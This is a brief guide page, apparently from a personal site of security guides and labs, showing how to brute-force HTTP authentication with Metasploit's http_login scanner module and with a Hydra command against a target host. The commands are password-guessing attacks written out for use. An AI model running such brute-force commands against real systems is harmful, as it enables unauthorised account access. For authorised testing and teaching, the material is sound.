brutalize http auth

with msf

use auxiliary/scanner/http/http_login
set AUTH_URI /share/
set BLANK_PASSWORDS true
...
set VERBOSE false
run

with hydra

apt install hydra
hydra -L usernames.txt -p password $target http-get / -s 80

HOME | GUIDES | LECTURES | LAB | SMTP HEALTH | HTML5 | CONTACT
Copyright © 2024 Pierre-Philipp Braun